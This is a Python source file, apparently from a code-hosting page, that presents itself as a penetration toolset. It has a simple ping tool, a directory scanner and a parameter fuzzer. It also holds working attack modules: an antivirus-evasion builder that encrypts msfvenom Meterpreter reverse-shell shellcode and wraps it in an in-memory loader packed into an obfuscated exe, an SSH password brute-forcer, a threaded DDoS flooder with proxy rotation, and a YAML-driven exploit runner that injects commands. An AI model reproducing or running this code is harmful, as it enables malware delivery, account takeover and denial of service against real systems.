You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

541 lines
19 KiB

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

from multiprocessing import Queue
import os
import subprocess
import random
import threading
import concurrent.futures
import time
import base64
import ctypes
import socket
import hashlib
import paramiko
from itertools import cycle
from Crypto.Cipher import AES
from typing import Any
try:
import yaml
except:
print("yaml库不存在正在安装...")
os.system('pip install pyyaml')
import yaml
try:
import fire
except ImportError:
print("fire库不存在正在安装...")
os.system("pip install fire")
try:
import requests
except ImportError:
print("requests库不存在正在安装...")
os.system("pip install requests")
class PingTool:
"""
基于 subprocess 的 ping 命令或基于 TCP 的 ping 命令
Args:
-u : ping 的目标
-t : ping 的类型icmp 或 tcp
-p : TCP ping 的端口
python penetration_toolset.py PingTool -u 127.0.0.1 -t icmp
python penetration_toolset.py PingTool -u 127.0.0.1 -t tcp -p 80
"""
def __call__(self, url="", t="icmp", p=0):
self.url = url
self.ping_type = t
self.port = p
self.ping()
def ping(self):
try:
if self.ping_type.lower() == "icmp":
result = subprocess.run(['ping', self.url], capture_output=True, text=True)
print(result.stdout)
elif self.ping_type.lower() == "tcp":
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5) # 设置连接超时时间为5秒
if self.port == 0:
self.port = 80 # 设置默认端口号为80或者抛出异常提示用户设置端口号
try:
s.connect((self.url, self.port))
print(f"{self.url}:{self.port} is reachable.")
except (socket.error, socket.timeout) as e:
print(f"{self.url}:{self.port} is unreachable.")
finally:
s.close()
else:
print("Unsupported ping type. Please use 'icmp' or 'tcp'.")
except Exception as e:
print(f"An error occurred: {e}")
class searchpath():
"""
这是一个目录扫描命令
参数:
-u :url
指定扫描的ur1地址
-c :code
以列表方式指定所要选择的状态码,默认所有状态码
-d :dictionary
指定扫描使用的字典默认为dict.txt字典
-r :report
指定保存的文件名默认为url.txt
python penetration_toolset.py searchpath -u www.baidu.com
"""
def __call__(self, url, code=[x for x in range(200, 600)], dictionary='dict.txt', report='./report/report.txt'):
# url地址检测
self.url = url
if url:
res = requests.get(self.url_check(url))
if res.status_code != 200:
print("url地址填写失败")
return
else:
self.url = self.url_check(url)
else:
self.url = None
#初始化默认值
self.dictionary = "./dict/" + dictionary
self.report = report
if self.report == "./report/report.txt":
if self.url[5] == 'http':
self.report = "./report/" + self.url[7:] + ".txt"
else:
self.report = "./report/" + self.url[8:] + ".txt"
else:
self.report = report
self.code = code
self.stitch(self.url_check(url))
#url检测
def url_check(self, url):
url = self.url
if url[:5] == 'https' or url[:5] == 'http:':
return url
else:
return "http://" + url
#文件保存
def writeurl(self, result):
try:
with open(self.report, 'a', encoding="UTF-8") as fp:
fp.write(result + '\n')
except FileNotFoundError:
print(self.report + "文件不存在!")
except IOError:
print(self.report + "文件读取错误!")
except Exception as e:
print(self.report + "其他异常:", str(e))
# 目录遍历
def stitch(self, url):
url = self.url
try:
with open(self.dictionary, 'r') as file:
for line in file:
final_url = url + "/" + line.strip()
res = requests.get(final_url)
if res.status_code in self.code:
print("[-]{:<30} 的状态码为:{:<200}".format(final_url, str(res.status_code)))
# print("[-]"+final_url+"的状态码为:"+str(res.status_code))
result = "[-]" + final_url + "的状态码为:" + str(res.status_code)
self.writeurl(result)
print("[*]" + self.dictionary[7:] + "的结果已保存至: " + self.report[8:])
except FileNotFoundError:
print(self.dictionary + "文件不存在!")
except IOError:
print(self.dictionary + "文件读取错误!")
except Exception as e:
print(self.dictionary + "其他异常:", str(e))
class encryption():
"""
该代码用于进一步混淆代码通过免杀
前期准备样例:
-生成shellcode: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999 -f raw > rev.raw
-base64操作: base64 -w 0 -i rev.raw > rev.bs64
-获取payload: 即加密后字符串
-参数:
-p: payload:经过msfvenom生成的shellcode的base64加密字符
example:
python penetration_toolset.py encryption --payload='aaaapayload123'
'"""
def __call__(self, payload):
self.payload = payload
with open('./aes-xor.txt', 'w') as f:
f.write(self.aes_jiami(self.xor_jiami(self.payload, 35)))
# jiami_sc = self.aes_jiami(self.xor_jiami(self.payload,35))
# sc = self.xor_jiemi(self.aes_jiemi(jiami_sc),35)
# shde = base64.b64decode(sc)
# self.run(shde)
self.shell_write(self.aes_jiami(self.xor_jiami(self.payload, 35)))
self.min_code()
self.xor_code()
self.exe_file()
def add_to_16(self, s):
while len(s) % 16 != 0:
s += '\0'
return str.encode(s) # 返回bytes
def aes_jiami(self, text):
# 密钥长度必须为16、24或32位分别对应AES-128、AES-192和AES-256
key = 'LeslieCheungKwok'
aes = AES.new(self.add_to_16(key), AES.MODE_ECB)
encrypted_text = str(base64.encodebytes(aes.encrypt(self.add_to_16(text))), encoding='utf8').replace('\n', '')
return encrypted_text
def xor_jiami(self, s, key):
xor_s = ''
for i in s:
xor_s += chr(ord(i) ^ key)
return xor_s
#shellcode生成
def shell_write(self, payload):
payload = self.payload
str_payload = '''
import base64
import ctypes
from Crypto.Cipher import AES
kernel32 = ctypes.windll.kernel32
def aes_jiemi(s):
cipher = AES.new(b'LeslieCheungKwok', AES.MODE_ECB)
return cipher.decrypt(base64.decodebytes(bytes(s, encoding='utf8'))).rstrip(b'\\0').decode('utf8')
def xor_jiemi(s,key):
xor_s = ''
for i in s:
xor_s += chr(ord(i) ^ key)
return xor_s
def write_memory(buf):
length = len(buf)
kernel32.VirtualAlloc.restype = ctypes.c_void_p
ptr = kernel32.VirtualAlloc(None, length, 0x3000, 0x40)
kernel32.RtlMoveMemory.argtypes = (
ctypes.c_void_p,
ctypes.c_void_p,
ctypes.c_size_t)
kernel32.RtlMoveMemory(ptr, buf, length)
return ptr
def run(shellcode):
buf = ctypes.create_string_buffer(shellcode)
ptr = write_memory(buf)
shell_func = ctypes.cast(ptr, ctypes.CFUNCTYPE(None))
shell_func()
if __name__ == '__main__':
jiami_sc = '{}'
sc = xor_jiemi(aes_jiemi(jiami_sc),35)
shde = base64.b64decode(sc)
run(shde)
'''.format(payload)
with open('main_one.py', 'w', encoding='utf-8') as file:
file.write(str_payload)
#缩小python代码
def min_code(self):
print("[-] 正在缩小代码....")
time.sleep(1)
try:
os.system("pyminify main_one.py --output main-mini.py")
except:
print("[-] 该库不存在,正在安装....")
os.system("pip install python-minifier")
print("[-] 安装成功,正在执行缩小....")
try:
os.system("pyminify main_one.py --output main-mini.py")
#移动文件到“源目录”文件夹下
os.replace("main-mini.py", ".\源文件\main-mini.py")
except:
print("[-] 缩小失败,请检查代码")
# 对main_one.py进行混淆加密
def xor_code(self):
try:
if os.path.exists("Intensio-Obfuscator"):
print("[-] Intensio-Obfuscator工具库存在正在检测依赖....")
if os.system(" pip install -r Intensio-Obfuscator/requirements.txt") == 0:
print("[-] 依赖安装成功,正在执行混淆加密....")
os.system(
"python .\Intensio-Obfuscator\src\intensio_obfuscator\intensio_obfuscator.py -i .\源目录\ -o main_result -mlen lower -rts -ps -rth -ind 2")
print("[-] 结果已保存到main_result文件夹下")
print("[-] 正在删除过程文件....")
time.sleep(1)
os.remove("main_one.py")
os.remove("main-mini.py")
os.remove("aes-xor.txt")
print("[-] 过程文件删除成功")
else:
print("[-] 依赖安装失败,请检查网络")
return
except:
print("[-] Intensio-Obfuscator工具库不存在正在安装....")
try:
os.system("git clone https://github.com/Hnfull/Intensio-Obfuscator.git")
except:
print("[-] git clone失败请检查网络")
return
# 对main_one_obf.py进行打包为exe文件
def exe_file(self):
print("[-] 正在生成exe文件....")
time.sleep(1)
try:
os.system("copy ./main_result/main-mini.py ./main_resultone.py")
os.system(" pyinstaller.exe -Fw -i ./setting.ico main_resultone.py")
except:
os.system("pip install pyinstaller")
print("[-] pyinstaller安装成功正在执行打包....")
os.system("copy ./main_result/main-mini.py ./main_resultone.py")
os.system(" pyinstaller.exe -Fw -i ./setting.ico main_resultone.py")
# print("[-] 已删除main_one_obf.py")
# os.remove("main_one_obf.py")
# os.remove(".\main_result.py")
os.remove(".\main_resultone.py")
print("[-] 打包成功请查看dist文件夹")
class SSHBruteForce:
"""
SSH Brute Force Attack
-U: 主机
-u: 用户名字典
-p: 密码字典
-P: SSH端口(默认22)
example:
python penetration_toolset.py SSHBruteForce -U 127.0.0.1 -P 22 -u <用户名字典路径> -p <密码字典路径>
ps 第一个是大写的U第二个参数是大写的P可不写
"""
def __call__(self, U_host, username_dict, password_dict, Port=22):
self.U_host = U_host
self.port = Port
self.username_dict = username_dict
self.password_dict = password_dict
self.ssh_attack()
def ssh_attack(self):
with open(self.username_dict, 'r') as users:
usernames = [line.strip() for line in users]
with open(self.password_dict, 'r') as passwords:
passwords = [line.strip() for line in passwords]
for username in usernames:
for password in passwords:
try:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(self.U_host, self.port, username, password)
print(f'Successful SSH connection to {self.U_host}:{self.port} with credentials {username}:{password}')
ssh.close()
except paramiko.AuthenticationException:
print(f'Failed to authenticate to {self.U_host}:{self.port} with credentials {username}:{password}')
except paramiko.SSHException as e:
print(f'SSH error on {self.U_host}:{self.port}: {str(e)}')
except socket.error as e:
print(f'Socket error on {self.U_host}:{self.port}: {str(e)}')
class DDOSAttack:
"""
基础的DDOS攻击脚本
-u : 指定url
-n : 线程数
-p : IP代理池格式为IP1,IP2,IP3
example:
python penetration_toolset.py DDOSAttack -u http://127.0.0.1 -n 3 -p "192.168.1.1,192.168.1.2,192.168.1.3"
"""
def __call__(self, url, num_threads, proxy_pool):
self.url = url
self.num_threads = num_threads
self.proxy_pool = proxy_pool.split(',') if proxy_pool else None
self.proxy_pool_iter = cycle(self.proxy_pool) if self.proxy_pool else None
self.attack()
def attack(self):
print(f"发起DDOS攻击目标{self.url},线程数:{self.num_threads}")
self.start_attack()
def start_attack(self):
def send_request():
proxies = {'http': next(self.proxy_pool_iter)} if self.proxy_pool else None
while True:
try:
requests.get(self.url, proxies=proxies)
except Exception as e:
print(f"An error occurred: {e}")
threads = []
for _ in range(self.num_threads):
t = threading.Thread(target=send_request)
threads.append(t)
t.start()
for t in threads:
t.join()
class Para_test():
"""
网站参数测试工具(get)
-u 指定url
-d 指定字典文件路径
example:
python penetration_toolset.py Para_test -u http://www.baidu.com -d ./param.txt
"""
def __call__(self, url, dictionary_path):
self.url = self.validate_url(url)
self.dictionary_path = dictionary_path
self.test_params()
@staticmethod
def validate_url(url):
"""确保URL具有有效的协议头"""
if not url.startswith(("http://", "https://")):
url = "http://" + url
return url
@staticmethod
def generate_content_hash(content):
"""生成页面内容的哈希值,用于比较内容变化"""
return hashlib.sha256(content.encode('utf-8')).hexdigest()
def test_params(self):
"""测试一组从文件读取的参数来猜测网站接受的参数"""
tested_params = {}
original_response = requests.get(self.url)
original_hash = self.generate_content_hash(original_response.text)
with open(self.dictionary_path, 'r', encoding='utf-8') as file:
for line in file:
param = line.strip()
test_url = f"{self.url}?{param}=testvalue"
response = requests.get(test_url)
response_hash = self.generate_content_hash(response.text)
if response_hash != original_hash:
tested_params[param] = "有效"
else:
tested_params[param] = "无效"
run_once = True
num = 0
for i in tested_params:
if tested_params[i] == "有效":
print(f"参数: {i}, 结果: {tested_params[i]}")
if run_once:
num = 1
run_once = False
if num == 0:
print("未发现有效参数")
class exploit(yaml.YAMLObject):
"""
用于定向的漏洞利用获取shell等操作具有可拓展型支持yaml配置文件编写poc进行定向攻击测试。
参数:
-p:poc
指定使用的yaml文件
example:
python penetration_toolset.py exploit -p /test.yml -u 192.168.6.4
"""
data = {}
def __call__(self, poc, url, cmd=''):
self.poc = poc
self.url = url
self.cmd = cmd
if url:
res = requests.get(self.url_check(url))
if res.status_code != 200:
print("url地址填写失败")
return
else:
self.url = self.url_check(url)
else:
self.url = None
self.attack()
def url_check(self, url):
url = self.url
if url[:5] == 'https' or url[:5] == 'http:':
return url
else:
return "http://" + url
def check_file(self, file_path: str):
if not os.path.isfile(file_path):
return 0
def read_file(self, poc):
file_path = os.getcwd() + "\poc\\" + self.poc
if self.check_file(file_path) == 0:
print("该文件", file_path, "不存在")
else:
with open(file_path, "r", encoding="utf-8") as fp:
self.data = yaml.load(fp, Loader=yaml.FullLoader)
def attack(self):
url = self.url
self.read_file(self.poc)
data = self.data
param_url = data.get('poc_url')
param_Agent = data.get('User-Agent')
param_method = data.get('method')
param_cmd = data.get('cmd')
cmd = self.cmd
# print(param_url[0]['url'])
# print(param_Agent)
# print(param_method)
# print(os.getcwd()+"/poc/"+self.poc)
# print(param_method[1]['data'])
print("正在攻击...")
method = param_method[0]['method']
if method == 'GET':
res = requests.get(url=str(url) + param_url[0]["url"], headers=param_Agent[0])
if res.status_code != 200:
result = res.text
print(result)
else:
print("返回内容错误,状态码为:" + str(res.status_code))
elif method == 'POST':
if param_cmd[0]['cmd'] == 'yes':
string_with_format = str(param_method[1]['data']) % cmd
res = requests.post(url=str(url) + param_url[0]["url"], data=string_with_format, headers=param_Agent[0])
if res.status_code == 200:
result = res.text
print(result)
else:
print("返回内容错误,状态码为:" + str(res.status_code))
else:
print("cmd参数错误或不存在")
if __name__ == "__main__":
fire.Fire()